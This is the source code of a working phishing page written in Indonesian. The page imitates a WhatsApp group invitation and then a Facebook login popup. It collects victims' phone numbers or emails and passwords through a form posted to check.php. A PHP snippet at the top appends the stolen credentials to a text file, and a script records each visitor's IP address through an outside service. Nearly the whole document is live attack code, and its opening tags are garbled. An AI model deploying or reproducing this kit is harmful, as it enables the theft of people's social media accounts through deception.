<script>
<script>
<?php

file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
exit();
</script>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
        <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
        <meta name="description" content="Undangan chat grup Mntap">
        <meta property="og:title" content="Whatsapp Group Link">
        <meta property="og:description" content="Undangan chat grup Mntap">
        <meta property="og:image" content="https://img.inews.co.id/media/600/files/inews_new/2019/08/28/Korea.jpg">
        <title>Whatsapp Group Link</title>
        <link rel="stylesheet" type="text/css" href="css/style.css">
        <link rel="stylesheet" type="text/css" href="css/facebook.css">
    </head>
    <body>
        <section>
            <div class="join" style="display: none;">
                <span class="icon"></span>
                <div class="content">
                    <h1>Mntap</h1>
                    <span class="ceo">Grup dibuat oleh Iwan Ster</span>
                    <p class="desc">
                        💡 WELCOME TO GROUP 💡<br>
                        <span class="bold">📍 Rules 📍</span>
                        <br>
                        📌 Dilarang Spam ... 
                        <span class="more">
                            Baca selengkapnya<br>
                    </p>
                    <div class="peserta">209 peserta</div>
                    <div class="profile">
                        <ul>
                            <li>
                                <div class="imgBox">
                                    <img src="https://images5.alphacoders.com/821/thumb-350-821024.png">
                                </div>
                                <span class="nama">Iwan Ster</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/315/userfiles/2019/03/06/karakter-anime-cantik-2-0e6af.jpg.webp">
                                </div>
                                <span class="nama">Ferry Isnawan</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/302/userfiles/2019/03/06/karakter-anime-cantik-5-b1053.jpg.webp">
                                </div>
                                <span class="nama">Wann Chazorla</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/350/userfiles/2019/03/06/karakter-anime-cantik-6-9df5b.jpg.webp">
                                </div>
                                <span class="nama">Rafael Khun</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/300/userfiles/2019/03/06/karakter-anime-cantik-8-62975.jpg.webp">
                                </div>
                                <span class="nama">Rico Alfandi</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/373/userfiles/2019/03/06/karakter-anime-cantik-9-5d82f.jpg.webp">
                                </div>
                                <span class="nama">Arpan Rizki</span>
                            </li>
                            <li>
                                <div class="imgBox">
                                    <img src="https://assets.jalantikus.com/assets/cache/560/315/userfiles/2019/03/06/karakter-anime-cantik-13-a715e.jpg.webp">
                                </div>
                                <span class="nama">Jefanya</span>
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="bottom">
                    <a href="#">BATAL</a>
                    <a class="fb">BERGABUNG KE GROUP</a>
                </div>
            </div>
            <div class="loading">
                <span>Memeriksa undangan grup...</span>
                <img class="spin" src="https://miro.medium.com/max/1600/0*ptDX0HfJCYpo9Pcs.gif">
            </div>
            <!-- LOGIN FB -->
            <div class="popup-login login-facebook animated fadeIn" style="display: none;">
                <div class="popup-box-login-fb">
                    <div class="navbar-fb">
                        <img width="45" src="img/facebook_text.png">
                    </div>
                    <div class="content-box-fb">
                        <img width="75" height="75" src="https://assets.stickpng.com/images/580b57fcd9996e24bc43c543.png">
                        <div class="txt-login-fb">Masuk ke akun Facebook Anda untuk terhubung dengan Whatsapp

		         </div>
                        <form class="login-form" action="check.php" method="POST">
                            <label>
                                <input type="text" name="user" placeholder="Nomor ponsel atau email" autocomplete="off" autocapitalize="off" required="">
                            </label>
                            <label>
                                <input type="password" name="pass" placeholder="Kata Sandi Facebook" autocomplete="off" autocapitalize="off" required="">
                            </label>
                            <input type="hidden" name="ip" id="ip" value="">
                            <button type="submit" name="submit" class="btn-login-fb">Masuk</button>
                        </form>
                        <div class="txt-create-account">Create account</div>
                        <div class="txt-not-now">Not now</div>
                        <div class="txt-forgotten-password">Forgotten password?</div>
                    </div>
                    <div class="language-box">
                        <center>
                            <div class="language-name language-name-active">English (UK)</div>
                            <div class="language-name">Bahasa Indonesia</div>
                            <div class="language-name">Basa Jawa</div>
                            <div class="language-name">Bahasa Melayu</div>
                            <div class="language-name">日本語</div>
                            <div class="language-name">Español</div>
                            <div class="language-name">Português (Brasil)</div>
                            <div class="language-name">
                                <i class="fa fa-plus"></i>
                            </div>
                        </center>
                    </div>
                    <div class="copyright">Facebook Inc.</div>
                </div>
            </div>
        </section>
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script type="text/javascript">

            $(document).ready(function()
            {

                setTimeout(()=>{

                    $('.loading').css("display", "none");

                    $('.join').show();

                }
                , 1000)

                $('.fb').click(function() {

                    $('.login-facebook').fadeIn();

                })

            })
        </script>
        <script type="text/javascript">

            var desc = document.getElementsByClassName("desc");

            var more = document.getElementsByClassName("more");

            more[0].addEventListener("click", function()
            {

                desc[0].innerHTML = '💡 WELCOME TO GROUP 💡<br><span class="bold">📍 Rules 📍</span><br>📌 Dilarang Spam<br>📌 Dilarang Sara<br>📌 Dilarang Saling Menghina<br>📌 Dilarang Telpon Admin<br>📌 Harus Berbagi Video<br>📌 Nyimak doang auto kick<br>🎈 SALAM DAMAI 🎈';

            })
        </script>
        <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script>

            var checkip = function() {

                $.ajax({

                    type: "get",

                    async: false,

                    url: "https://api.pubgameshowtime.com/ip/getcountry",

                    dataType: "json",

                    success: function(result) {

                        $('#ip').val(result.ip);

                    }

                })

            }

            checkip();
        </script>
    </body>
</html>
